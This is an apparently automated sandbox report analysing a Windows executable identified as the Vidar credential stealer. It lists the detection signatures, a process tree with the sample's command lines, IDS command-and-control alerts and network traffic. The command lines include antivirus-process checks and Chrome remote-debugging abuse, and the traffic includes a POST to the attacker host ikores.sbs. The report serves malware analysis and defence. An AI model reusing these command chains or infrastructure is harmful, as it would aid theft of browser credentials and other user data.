Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Yn13dTQdcW.exe

Overview

General Information

Sample name:Yn13dTQdcW.exe
renamed because original name is a hash value
Original sample name:82ccd973e00420a4768bc76d2f442f52.exe
Analysis ID:1569757
MD5:82ccd973e00420a4768bc76d2f442f52
SHA1:893c63dad01eb0367c11325efbf8492e193b15c3
SHA256:37919954152f36fb936ba48b6418c1172471ff9cc4627a7f3f941353e2c17b91
Tags:exeVidaruser-abuse_ch
Infos:

Detection

Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Attempt to bypass Chrome Application-Bound Encryption
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected Vidar stealer
AI detected suspicious sample
Drops PE files with a suspicious file extension
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Browser Started with Remote Debugging
Sigma detected: Suspicious Copy From or To System Directory
Uses 32bit PE files

Classification

  • System is w10x64
  • Yn13dTQdcW.exe (PID: 7524 cmdline: "C:\Users\user\Desktop\Yn13dTQdcW.exe" MD5: 82CCD973E00420A4768BC76D2F442F52)
    • cmd.exe (PID: 7564 cmdline: "C:\Windows\System32\cmd.exe" /c copy Premium Premium.cmd && Premium.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 7656 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7668 cmdline: findstr /I "wrsa opssvc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 7700 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7708 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7748 cmdline: cmd /c md 402438 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • findstr.exe (PID: 7764 cmdline: findstr /V "integratedintlhandlingwaterproofcbperformtreasurertim" Recording MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7788 cmdline: cmd /c copy /b ..\Coaches + ..\Hypothetical + ..\Nasty + ..\Fly + ..\Zum + ..\Disclose + ..\Expensive + ..\Argue N MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Suicide.com (PID: 7804 cmdline: Suicide.com N MD5: 6EE7DDEBFF0A2B78C7AC30F6E00D1D11)
        • chrome.exe (PID: 7536 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • chrome.exe (PID: 7600 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2576 --field-trial-handle=2344,i,2585248863302198166,5180447785711478511,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • choice.exe (PID: 7820 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
    Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: Suicide.com N, ParentImage: C:\Users\user\AppData\Local\Temp\402438\Suicide.com, ParentProcessId: 7804, ParentProcessName: Suicide.com, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 7536, ProcessName: chrome.exe
    Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy Premium Premium.cmd && Premium.cmd, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Premium Premium.cmd && Premium.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\Yn13dTQdcW.exe", ParentImage: C:\Users\user\Desktop\Yn13dTQdcW.exe, ParentProcessId: 7524, ParentProcessName: Yn13dTQdcW.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Premium Premium.cmd && Premium.cmd, ProcessId: 7564, ProcessName: cmd.exe

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: Process startedAuthor: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Premium Premium.cmd && Premium.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7564, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 7708, ProcessName: findstr.exe
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-12-06T09:42:10.293155+010020442471Malware Command and Control Activity Detected5.75.212.196443192.168.2.449808TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-12-06T09:42:12.558181+010020518311Malware Command and Control Activity Detected5.75.212.196443192.168.2.449814TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-12-06T09:42:08.026227+010020490871A Network Trojan was detected192.168.2.4498025.75.212.196443TCP

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: https://ikores.sbs/Avira URL Cloud: Label: malware
    Source: ikores.sbsVirustotal: Detection: 14%Perma Link
    Source: Yn13dTQdcW.exeReversingLabs: Detection: 34%
    Source: Yn13dTQdcW.exeVirustotal: Detection: 22%Perma Link
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 94.8% probability
    Source: Yn13dTQdcW.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49784 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 5.75.212.196:443 -> 192.168.2.4:49790 version: TLS 1.2
    Source: Yn13dTQdcW.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: C:\Users\user\Desktop\Yn13dTQdcW.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
    Source: C:\Users\user\Desktop\Yn13dTQdcW.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\402438\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\402438Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
    Source: chrome.exeMemory has grown: Private usage: 0MB later: 40MB

    Networking

    barindex
    Source: Network trafficSuricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.4:49802 -> 5.75.212.196:443
    Source: Network trafficSuricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 5.75.212.196:443 -> 192.168.2.4:49814
    Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 5.75.212.196:443 -> 192.168.2.4:49808
    Source: global trafficHTTP traffic detected: GET /m3wm0w HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
    Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
    Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
    Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
    Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /m3wm0w HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6Host: ikores.sbsConnection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: chrome.exe, 00000010.00000002.2727760443.000078C400702000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
    Source: chrome.exe, 00000010.00000002.2727760443.000078C400702000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
    Source: chrome.exe, 00000010.00000003.2658016324.000078C400FC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2658098620.000078C400F9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2657755706.000078C400388000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
    Source: chrome.exe, 00000010.00000003.2658016324.000078C400FC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2658098620.000078C400F9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2657755706.000078C400388000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
    Source: chrome.exe, 00000010.00000002.2727760443.000078C400702000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
    Source: chrome.exe, 00000010.00000002.2727760443.000078C400702000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
    Source: chrome.exe, 00000010.00000002.2726202059.000078C4002D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
    Source: global trafficDNS traffic detected: DNS query: LsPLJakEeBsUGsRzAQLUPOMOxfXyb.LsPLJakEeBsUGsRzAQLUPOMOxfXyb
    Source: global trafficDNS traffic detected: DNS query: t.me
    Source: global trafficDNS traffic detected: DNS query: ikores.sbs
    Source: global trafficDNS traffic detected: DNS query: www.google.com
    Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----7Q9R9ZCTRI5F37GVSJ5XUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6Host: ikores.sbsContent-Length: 256Connection: Keep-AliveCache-Control: no-cache
    Source: chrome.exe, 00000010.00000003.2653702295.000078C40089C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2727977288.000078C400740000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2650227930.000078C400388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653673202.000078C400388000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/1423136
    Source: chrome.exe, 00000010.00000002.2730999362.000078C400C34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653702295.000078C40089C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2650227930.000078C400388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653673202.000078C400388000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2162
    Source: chrome.exe, 00000010.00000002.2730999362.000078C400C34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653702295.000078C40089C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2650227930.000078C400388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653673202.000078C400388000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2517
    Source: chrome.exe, 00000010.00000002.2730999362.000078C400C34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653702295.000078C40089C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2650227930.000078C400388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653673202.000078C400388000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2970
    Source: chrome.exe, 00000010.00000002.2730999362.000078C400C34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653702295.000078C40089C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2650227930.000078C400388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653673202.000078C400388000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3078
    Source: chrome.exe, 00000010.00000002.2730999362.000078C400C34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653702295.000078C40089C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2650227930.000078C400388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653673202.000078C400388000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3205
    Source: chrome.exe, 00000010.00000002.2730999362.000078C400C34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653702295.000078C40089C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2650227930.000078C400388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653673202.000078C400388000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3206
    Source: chrome.exe, 00000010.00000002.2730999362.000078C400C34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653702295.000078C40089C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2650227930.000078C400388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653673202.000078C400388000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3452
    Source: chrome.exe, 00000010.00000002.2730999362.000078C400C34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653702295.000078C40089C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2650227930.000078C400388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653673202.000078C400388000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3498
    Source: chrome.exe, 00000010.00000002.2730999362.000078C400C34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653702295.000078C40089C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2650227930.000078C400388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653673202.000078C400388000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3502
    Source: chrome.exe, 00000010.00000002.2730999362.000078C400C34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653702295.000078C40089C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2650227930.000078C400388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653673202.000078C400388000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3577
    Source: chrome.exe, 00000010.00000002.2730999362.000078C400C34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653702295.000078C40089C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2650227930.000078C400388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653673202.000078C400388000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3584
    Source: chrome.exe, 00000010.00000002.2730999362.000078C400C34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653702295.000078C40089C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2650227930.000078C400388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653673202.000078C400388000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3586
    Source: chrome.exe, 00000010.00000003.2653673202.000078C400388000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3623
    Source: chrome.exe, 00000010.00000003.2653673202.000078C400388000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3624
    Source: chrome.exe, 00000010.00000003.2653673202.000078C400388000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3625
    Source: chrome.exe, 00000010.00000002.2730999362.000078C400C34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653702295.000078C40089C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2650227930.000078C400388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653673202.000078C400388000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3832
    Source: chrome.exe, 00000010.00000002.2730999362.000078C400C34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653702295.000078C40089C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2650227930.000078C400388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653673202.000078C400388000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3862
    Source: chrome.exe, 00000010.00000002.2730999362.000078C400C34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653702295.000078C40089C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2650227930.000078C400388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653673202.000078C400388000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3965
    Source: chrome.exe, 00000010.00000002.2730999362.000078C400C34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653702295.000078C40089C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2650227930.000078C400388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653673202.000078C400388000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3970
    Source: chrome.exe, 00000010.00000002.2730999362.000078C400C34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653702295.000078C40089C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2650227930.000078C400388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653673202.000078C400388000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4324
